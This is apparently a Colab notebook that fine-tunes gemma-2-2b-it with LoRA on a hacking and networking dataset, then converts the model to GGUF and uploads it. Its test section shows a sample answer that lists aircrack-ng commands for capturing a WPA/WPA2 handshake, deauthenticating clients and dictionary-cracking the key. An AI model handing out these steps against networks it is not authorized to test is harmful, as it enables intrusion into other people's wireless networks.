# Required libraries

In [None]:
## Install required libraries
# Fine-tuning stack from PyPI (quiet mode).
!pip install -q transformers datasets accelerate bitsandbytes peft trl torch
# Development versions of peft and transformers, installed from GitHub.
!pip install -q git+https://github.com/huggingface/peft.git
!pip install -q git+https://github.com/huggingface/transformers.git
!pip install -q sentencepiece
!pip install -q llama-cpp-python
!pip install -q ctranslate2
# NOTE(review): this re-resolves packages that were already installed above
# (including the two installed from git) -- confirm which versions end up active.
!pip install --upgrade transformers accelerate peft trl torch
# NOTE(review): presumably stops the kernel so the freshly installed packages
# are picked up after a restart -- confirm; cells below must be run afterwards.
exit()

# Imports:

In [None]:
import os
import torch
from datasets import load_dataset, concatenate_datasets
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    TrainingArguments,
    Trainer,
    DataCollatorForLanguageModeling
)
from peft import prepare_model_for_kbit_training, LoraConfig, get_peft_model
from trl import SFTTrainer


# Model download:

In [None]:
MODEL_NAME = "google/gemma-2-2b-it"  # Replace with the actual model name.
# Supported models (and many more):
#    1. google/gemma-2-9b
#    2. google/gemma-2-2b
#    3. google/gemma-2-2b-it
#    4. google/codegemma-2b
#    5. google/codegemma-7b-it
#    6. microsoft/Phi-3-mini-4k-instruct
#    7. microsoft/Phi-3-mini-128k-instruct
#    8. microsoft/Phi-3-medium-128k-instruct
#    9. Qwen/Qwen2-7B-Instruct
#   10. Qwen/Qwen2-7B-Instruct-AWQ
#   11. meta-llama/Meta-Llama-3.1-8B

# For gated models pass token="hf-token_from_huggingface" to from_pretrained
# (`token` replaces the deprecated `use_auth_token` argument).
tokenizer = AutoTokenizer.from_pretrained(
    MODEL_NAME,
    # token="",
)

# Only fall back to EOS-as-padding when the tokenizer ships without a pad
# token. The causal-LM data collator used for training ignores every position
# whose id equals pad_token_id when computing the loss; if pad == EOS, the EOS
# token appended to each training example is ignored too and the model never
# learns where to stop generating.
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token

## 4-bit NF4 quantization: fp16 compute, no double quantization
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_use_double_quant=False,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.float16,
)

## Load the quantized base model and prepare it for k-bit training
model = prepare_model_for_kbit_training(
    AutoModelForCausalLM.from_pretrained(
        MODEL_NAME,
        device_map="auto",
        quantization_config=bnb_config,
        # use_auth_token=""
    )
)

## LoRA configuration: rank-16 adapters on the attention and MLP projections
lora_target_modules = [
    "q_proj", "k_proj", "v_proj", "o_proj",
    "gate_proj", "up_proj", "down_proj",
]
peft_config = LoraConfig(
    task_type="CAUSAL_LM",
    r=16,
    lora_alpha=16,
    lora_dropout=0.05,
    bias="none",
    target_modules=lora_target_modules,
)

## Wrap the prepared model with the LoRA adapters
model = get_peft_model(model, peft_config)


# Dataset Loading cell

In [None]:
# Alpaca-style prompt template. The three positional `{}` slots are filled,
# in order, with (instruction, input, response) by formatting_prompts_func.
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

# End-of-sequence marker of the loaded tokenizer; appended to every formatted
# training example by formatting_prompts_func.
EOS_TOKEN = tokenizer.eos_token

def formatting_prompts_func(examples):
    """
        Format a batch of examples into Alpaca-style training texts.

        Each (instruction, input, output) triple is substituted into the module-level
        ``alpaca_prompt`` template and the module-level ``EOS_TOKEN`` is appended.
        Column lookup is tolerant of a few alternative names:

            instruction: "instruction", then "system"
            input:       "input", then "command"
            output:      "output", "Output", "response", then "Response"

        A missing column is treated as empty, and because the columns are zipped
        together the result is then an empty list. ``None`` field values are rendered
        as an empty string instead of the literal text "None".

        Args:
            examples (dict): A batch mapping column names to lists of values, as passed
                             by ``Dataset.map(..., batched=True)``.

        Returns:
            dict: A dictionary with a single key "text" containing the list of formatted texts.
    """

    def first_present(*column_names):
        # Return the first column that exists in the batch, or [] when none does.
        for column_name in column_names:
            if column_name in examples:
                return examples[column_name]
        return []

    def as_text(value):
        # Avoid leaking the string "None" into the training text.
        return "" if value is None else value

    instructions = first_present("instruction", "system")
    inputs = first_present("input", "command")
    outputs = first_present("output", "Output", "response", "Response")

    texts = [
        alpaca_prompt.format(as_text(instruction), as_text(input_text), as_text(output)) + EOS_TOKEN
        for instruction, input_text, output in zip(instructions, inputs, outputs)
    ]
    return {"text": texts}  # Return a dictionary as expected by map function

def standardize_columns(dataset):
    """
        Standardizes the column names of a given dataset.

        Known alternative column names are renamed to the canonical
        "instruction" / "input" / "output" names. An alias is renamed only when it is
        present in the dataset and the canonical name is not already taken, so two
        aliases of the same column (or an alias next to the canonical column) never
        collide; the first alias in the table below wins and the others are left as-is.

        Args:
            dataset (Dataset): The dataset whose columns need to be standardized.
                            It should expose `column_names` and a method `rename_columns`
                            that accepts a dictionary for renaming.

        Returns:
            Dataset: The dataset with standardized column names.
    """
    # (alias, canonical name) pairs, checked in order.
    aliases = (
        ("Response", "output"),
        ("response", "output"),
        ("Output", "output"),
        ("Input", "input"),
        ("command", "input"),
        ("Instruction", "instruction"),
        ("system", "instruction"),
    )

    taken = set(dataset.column_names)
    renames = {}
    for alias, canonical in aliases:
        if alias in taken and canonical not in taken:
            renames[alias] = canonical
            # Track the post-rename column set so later aliases cannot collide.
            taken.discard(alias)
            taken.add(canonical)
    return dataset.rename_columns(renames)


# Hugging Face Hub repo ids of the datasets to fine-tune on. Add one entry per
# dataset; every dataset that loads successfully is concatenated below.

datasets_to_load = [
  "ICEPVP8977/Debian_Hacking_Networking",
]

def has_train_split(dataset_name):
    """
        Check if a dataset has a 'train' split.

        This function attempts to load a dataset and checks if it contains a 'train' split.

        Args:
            dataset_name (str): The name of the dataset to check.

        Returns:
            bool: True if the dataset has a 'train' split, False otherwise or if
                  loading fails (the failure reason is printed).

        Raises:
            None for ordinary errors: they are reported and False is returned.
            KeyboardInterrupt / SystemExit are deliberately not swallowed, so a
            long download can still be interrupted.
    """
    try:
        # split=None yields a mapping of split name -> dataset.
        available_splits = load_dataset(dataset_name, split=None)
    except Exception as error:
        print(f"Could not inspect {dataset_name}: {error}")
        return False
    return 'train' in available_splits



# Keep only the repos that expose a 'train' split.
datasets_with_train_split = list(filter(has_train_split, datasets_to_load))

# Load each candidate, normalise its column names and keep it only when all
# three Alpaca columns are available.
required_columns = ["instruction", "input", "output"]
datasets = []
for dataset_name in datasets_with_train_split:
    try:
        dataset = load_dataset(dataset_name, split="train")
        standardized_dataset = standardize_columns(dataset)

        available = standardized_dataset.column_names
        has_all_columns = not any(col not in available for col in required_columns)
        if not has_all_columns:
            print(f"Skipping {dataset_name}: Missing required columns")
        else:
            datasets.append(standardized_dataset)
            print(f"Successfully loaded and standardized: {dataset_name}")
    except Exception as e:
        print(f"Error loading {dataset_name}: {str(e)}")

# Merge everything into one dataset, render the prompt text (dropping the raw
# columns) and shuffle with a fixed seed for reproducibility.
combined_dataset = concatenate_datasets(datasets)

formatted_dataset = combined_dataset.map(
    formatting_prompts_func,
    batched=True,
    remove_columns=combined_dataset.column_names,
).shuffle(seed=199)


# Training configurations:

In [None]:
from transformers import TrainingArguments, DataCollatorForLanguageModeling
from trl import SFTTrainer

# Training hyperparameters. max_seq_length is intentionally not set here; it is
# passed to SFTTrainer when the trainer is constructed.
# NOTE(review): the "default" values quoted in the comments below look like the
# notebook author's suggested values rather than the TrainingArguments library
# defaults -- confirm before relying on them.
training_args = TrainingArguments(
    output_dir="./results",  # Checkpoints are written under this directory.
    num_train_epochs=3,  # Original note: "Default = 4".
    per_device_train_batch_size=2,  # Original note: default is 4; for low VRAM set to 1 or 2 depending on your GPU.
    gradient_accumulation_steps=2,  # Original note: default is 4; for low VRAM set to 1 or 2 depending on your GPU.
    warmup_steps=100,
    learning_rate=2e-4,  # Author's guidance: 5e-5 for general, fast adaptation; 1e-5 or lower when the model should reproduce the dataset text exactly.
    fp16=True,
    logging_steps=10,
    save_steps=100,
    save_total_limit=3,
    push_to_hub=False,
)


In [None]:

# Use a data collator for dynamic padding
# NOTE(review): this collator is expected to exclude pad-token positions from
# the loss; if the tokenizer's pad token equals its EOS token, confirm that the
# EOS appended to each example is still being learned.
data_collator = DataCollatorForLanguageModeling(
    tokenizer=tokenizer,
    mlm=False,  # Set to False for causal language modeling
)


In [None]:

# Initialize the trainer
# NOTE(review): `model` was already wrapped with get_peft_model() in the model
# cell and `peft_config` is passed again here -- confirm the installed trl
# version does not apply the adapter a second time.
# NOTE(review): whether `tokenizer`, `dataset_text_field`, `packing` and
# `max_seq_length` are accepted as SFTTrainer keyword arguments depends on the
# trl version (newer releases are expected to take them via SFTConfig /
# `processing_class`) -- confirm against the installed version.
trainer = SFTTrainer(
    model=model,
    args=training_args,
    train_dataset=formatted_dataset,
    peft_config=peft_config,
    dataset_text_field="text",  # Column produced by formatting_prompts_func
    tokenizer=tokenizer,
    data_collator=data_collator,  # Use the data collator
    packing=False,
    max_seq_length=8192  # Set the maximum sequence length here
)

In [None]:
# Train the model. Per training_args: metrics are logged every 10 steps and a
# checkpoint is saved under ./results every 100 steps (save_total_limit=3).
trainer.train()

# Save to 4 bit

In [None]:
model = trainer.model.merge_and_unload()

In [None]:
# Save the full model in 4 bit
model.save_pretrained("./full_model")

In [None]:
# Save the tokenizer
tokenizer.save_pretrained("./full_model")

# Save to f16/32 
### I recommend considering the f16/32 format for its ease of conversion to the GGUF format.

In [None]:

model = model.to(torch.float32)
# Now convert the model to FP16
model_fp16_path = "./model_fp16"
model.half()  # Convert model to FP16, comment this line out to keep the f32 float model
model.save_pretrained(model_fp16_path)
tokenizer.save_pretrained(model_fp16_path)

In [None]:
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

# After training is complete

# Save the LoRA adapter
# trainer.model.save_pretrained("./lora_adapter")
MODEL_NAME="google/gemma-2-2b-it" 
# Load the original base model in FP16
base_model = AutoModelForCausalLM.from_pretrained(
    MODEL_NAME,
    torch_dtype=torch.float16,
    device_map="auto",
    # use_auth_token=""
)

# Load the LoRA adapter
adapter_model = PeftModel.from_pretrained(base_model, "./model_fp16")

# Merge the LoRA weights with the base model
merged_model = adapter_model.merge_and_unload()

# Save the full merged model in FP16
merged_model.save_pretrained("./full_model_fp16", safe_serialization=True)

# Save the tokenizer
tokenizer.save_pretrained("./full_model_fp16")

# Test the trained model

In [None]:
import gc

import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

# Free VRAM: drop the export-time objects, then collect garbage and release
# PyTorch's cached CUDA memory.
del base_model, adapter_model, merged_model, tokenizer
gc.collect()
torch.cuda.empty_cache()

# Reload the merged model and its tokenizer from disk
merged_model_dir = "./full_model_fp16"
tokenizer = AutoTokenizer.from_pretrained(merged_model_dir)
merged_model = AutoModelForCausalLM.from_pretrained(
    merged_model_dir,
    torch_dtype=torch.float16,
    device_map="auto",
)


In [None]:
prompt = "How do I capture the handshake for WPA/WPA2 networks using Aircrack-ng?"

### ANSWER:
To capture the WPA/WPA2 handshake using Aircrack-ng, you need to follow these steps:

1. **Put the Wireless Interface in Monitor Mode:**
   You need to switch your wireless interface to monitor mode to capture packets. This can be done using the `airmon-ng` tool.

   ```bash
   airmon-ng start wlan0
   ```

   Replace `wlan0` with the name of your wireless interface.

2. **Start Airodump-ng to Capture the Handshake:**
   Use `airodump-ng` to capture the 4-way WPA/WPA2 handshake. You need to specify the channel and the BSSID (MAC address) of the access point you are targeting.

   ```bash
   airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
   ```

   Here:
   - `-c 9` specifies the channel of the wireless network.
   - `--bssid 00:14:6C:7E:40:80` specifies the MAC address of the access point.
   - `-w psk` sets the file name prefix for the capture file.
   - `ath0` is the interface name in monitor mode.

3. **Optional: Deauthenticate a Client to Force Reconnection:**
   If you want to speed up the process, you can use `aireplay-ng` to deauthenticate a client connected to the network, forcing it to reconnect and thus capturing the handshake.

   ```bash
   aireplay-ng --deauth 50 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
   ```

   Here:
   - `--deauth 50` sends 50 deauthentication packets.
   - `-a 00:14:6C:7E:40:80` specifies the MAC address of the access point.
   - `-c 00:0F:B5:FD:FB:C2` specifies the MAC address of the client to deauthenticate.

4. **Verify the Handshake Capture:**
   Once `airodump-ng` captures the handshake, you will see a message indicating that a WPA handshake has been captured.

   ```bash
   WPA handshake: 00:14:6C:7E:40:80
   ```

5. **Crack the Handshake:**
   After capturing the handshake, you can use `aircrack-ng` to crack the WPA/WPA2 pre-shared key using a dictionary attack.

   ```bash
   aircrack-ng -w wordlist.txt -b 00:14:6C:7E:40:80 psk-01.cap
   ```

   Here:
   - `-w wordlist.txt` specifies the wordlist file.
   - `-b 00:14:6C:7E:40:80` specifies the BSSID of the access point.
   - `psk-01.cap` is the capture file containing the handshake.

By following these steps, you can capture and attempt to crack the WPA/WPA2 pre-shared key using Aircrack-ng.

In [None]:
# prompt = "Your_question_here"
# Wrap the question in the same Alpaca template the model was fine-tuned on
# (empty input, empty response slot) so inference matches the training format.
model_input = alpaca_prompt.format(prompt, "", "")
inputs = tokenizer(model_input, return_tensors="pt").to(merged_model.device)
max_new_tokens = 2000  # Set the maximum number of tokens in the response
outputs = merged_model.generate(**inputs, max_new_tokens=max_new_tokens)
# Decode only the newly generated tokens, not the echoed prompt template.
prompt_length = inputs["input_ids"].shape[1]
response = tokenizer.decode(outputs[0][prompt_length:], skip_special_tokens=True)
print(response)

# Convert to GGUF

In [None]:
# Fetch llama.cpp and install the Python requirements listed in its repository.
!git clone https://github.com/ggerganov/llama.cpp.git
!pip install -r ./llama.cpp/requirements.txt 

In [None]:
# Create the output directory for the GGUF file.
!mkdir -p /content/gguf_model

In [None]:
# Convert the merged checkpoint in full_model_fp16 to a q8_0 GGUF file.
# NOTE(review): the absolute /content/... paths assume the working directory is
# /content, while the clone and the model saves above use relative paths --
# confirm when running outside that environment.
!/content/llama.cpp/convert_hf_to_gguf.py /content/full_model_fp16 --outfile /content/gguf_model/output_file.gguf --outtype q8_0

# Push to huggingface

In [None]:
import os

from huggingface_hub import login,HfApi


# Never paste an access token into the notebook: it would be saved with the
# file. The token is read from the HF_TOKEN environment variable instead; when
# it is unset (or empty), login() falls back to its interactive prompt.
login(token=os.environ.get("HF_TOKEN") or None)
api = HfApi()

In [None]:
## Upload the trained artifacts to the Hugging Face Hub: first the "full"
## merged model folder, then the "gguf" folder.
for local_folder in ("/content/full_model_fp16", "/content/gguf_model"):
    api.upload_folder(
        folder_path=local_folder,
        repo_id="",  # "your_repo_id"
        repo_type="model",  # specify the type of repository
    )